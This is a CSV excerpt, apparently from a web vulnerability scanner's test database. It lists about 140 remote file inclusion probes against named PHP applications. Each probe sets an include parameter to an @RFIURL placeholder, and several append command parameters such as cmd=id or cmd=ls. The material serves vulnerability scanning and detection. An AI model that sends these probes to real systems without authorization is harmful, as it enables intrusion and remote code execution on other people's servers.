"005563","5292","c","/phpMyChat.php3?=@RFIURL?cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005564","5292","c","/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005565","5292","c","/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005566","5292","c","/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005567","5292","c","/phpbb/sendmsg.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005568","5292","c","/phpcalendar/includes/calendar.php?phpc_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005569","5292","c","/phpcalendar/includes/setup.php?phpc_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005570","5292","c","/phpdebug_PATH/test/debug_test.php?debugClassLocation=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005571","5292","c","/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005572","5292","c","/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005573","5292","c","/phphd_downloads/common.php?phphd_real_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005574","5292","c","/phphost_directoryv2/include/admin.php?rd=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005575","5292","c","/phphtml.php?htmlclass_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005576","5292","c","/phpi/edit_top_feature.php?include_connection=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005577","5292","c","/phpi/edit_topics_feature.php?include_connection=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005578","5292","c","/phplib/site_conf.php?ordnertiefe=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005579","5292","c","/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005580","5292","c","/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005581","5292","c","/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005582","5292","c","/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005583","5292","c","/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005584","5292","c","/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005585","5292","c","/phplib/version/1.3.3/module/referenz.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005586","5292","c","/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005587","5292","c","/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005588","5292","c","/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005589","5292","c","/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005590","5292","c","/phplinks/includes/smarty.php?full_path_to_public_program=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005591","5292","c","/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005592","5292","c","/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005593","5292","c","/phppc/poll.php?is_phppc_included=1&relativer_pfad=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005594","5292","c","/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005595","5292","c","/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005596","5292","c","/phpquickgallery/gallery_top.inc.php?textFile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005597","5292","c","/phpreactor/inc/polls.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005598","5292","c","/phpreactor/inc/updatecms.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005599","5292","c","/phpreactor/inc/users.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005600","5292","c","/phpreactor/inc/view.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005601","5292","c","/phpress/adisplay.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005602","5292","c","/phpunity-postcard.php?plgallery_epost=1&gallery_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005603","5292","c","/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005604","5292","c","/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005605","5292","c","/phpyabs/moduli/libri/index.php?Azione=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005606","5292","c","/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005607","5292","c","/playlist.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005608","5292","c","/plugin/HP_DEV/cms2.php?s_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005609","5292","c","/plugin/HP_DEV/cms2.php?s_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005610","5292","c","/plugin/gateway/gnokii/init.php?apps_path[plug]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005611","5292","c","/plugins/1_Adressbuch/delete.php?folder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005612","5292","c","/plugins/BackUp/Archive.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005613","5292","c","/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005614","5292","c","/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005615","5292","c","/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005616","5292","c","/plugins/links/functions.inc?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005617","5292","c","/plugins/polls/functions.inc?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005618","5292","c","/plugins/rss_importer_functions.php?sitepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005619","5292","c","/plugins/safehtml/HTMLSax3.php?dir[plugins]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005620","5292","c","/plugins/safehtml/safehtml.php?dir[plugins]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005621","5292","c","/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005622","5292","c","/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005623","5292","c","/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005624","5292","c","/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005625","5292","c","/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005626","5292","c","/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005627","5292","c","/plugins/spamx/Import.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005628","5292","c","/plugins/spamx/LogView.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005629","5292","c","/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005630","5292","c","/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005631","5292","c","/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005632","5292","c","/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005633","5292","c","/plugins/staticpages/functions.inc?_CONF[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005634","5292","c","/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005635","5292","c","/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005636","5292","c","/plus.php?_pages_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005637","5292","c","/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005638","5292","c","/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005639","5292","c","/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005640","5292","c","/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005641","5292","c","/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005642","5292","c","/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005643","5292","c","/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005644","5292","c","/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005645","5292","c","/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005646","5292","c","/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005647","5292","c","/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005648","5292","c","/podcastgen1.0beta2/core/admin/login.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005649","5292","c","/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005650","5292","c","/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005651","5292","c","/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005652","5292","c","/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005653","5292","c","/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005654","5292","c","/podcastgen1.0beta2/core/recent_list.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005655","5292","c","/poll/view.php?int_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005656","5292","c","/pollvote.php?pollname=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005657","5292","c","/pop.php?base=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005658","5292","c","/popup_window.php?site_isp_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005659","5292","c","/popup_window.php?site_isp_root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005660","5292","c","/port.php?content=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005661","5292","c","/portal/includes/portal_block.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005662","5292","c","/portal/portal.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005663","5292","c","/portfolio.php?id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005664","5292","c","/portfolio/commentaires/derniers_commentaires.php?rep=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005665","5292","c","/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005666","5292","c","/prepare.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005667","5292","c","/prepare.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005668","5292","c","/prepend.php?_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005669","5292","c","/preview.php?php_script_path=@RFIURL?&cmd=dir","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005670","5292","c","/principal.php?conteudo=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005671","5292","c","/print.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005672","5292","c","/print.php?pager=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005673","5292","c","/print.php?print=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005674","5292","c","/process.php?DEFAULT_SKIN=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005675","5292","c","/professeurs/index.php?repertoire_config=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005676","5292","c","/profil.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005677","5292","c","/projects/weatimages/demo/index.php?ini[langpack]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005678","5292","c","/promocms/newspublish/include.php?path[bdocroot]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005679","5292","c","/protection.php?logout_page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005680","5292","c","/provider/auth.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005681","5292","c","/provider/auth.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005682","5292","c","/psynch/nph-psa.exe?css=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005683","5292","c","/psynch/nph-psf.exe?css=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005684","5292","c","/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005685","5292","c","/public_html/modules/Forums/favorites.php?nuke_bb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005686","5292","c","/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005687","5292","c","/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005688","5292","c","/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005689","5292","c","/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005690","5292","c","/qte_web.php?qte_web_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005691","5292","c","/quick_reply.php?phpbb_root_path=@RFIURL&mode=[file]","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005692","5292","c","/quickie.php?QUICK_PATH=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005693","5292","c","/random2.php?path_to_folder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005694","5292","c","/randshop/index.php?incl=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005695","5292","c","/rdf.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005696","5292","c","/reactivate.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005697","5292","c","/read.php?data=@RFIURL? ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005698","5292","c","/readmore.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005699","5292","c","/recent.php?insPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005700","5292","c","/rechnung.php?_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005701","5292","c","/reconfig.php?GLOBALS[CLPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005702","5292","c","/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005703","5292","c","/redirect.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005704","5292","c","/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
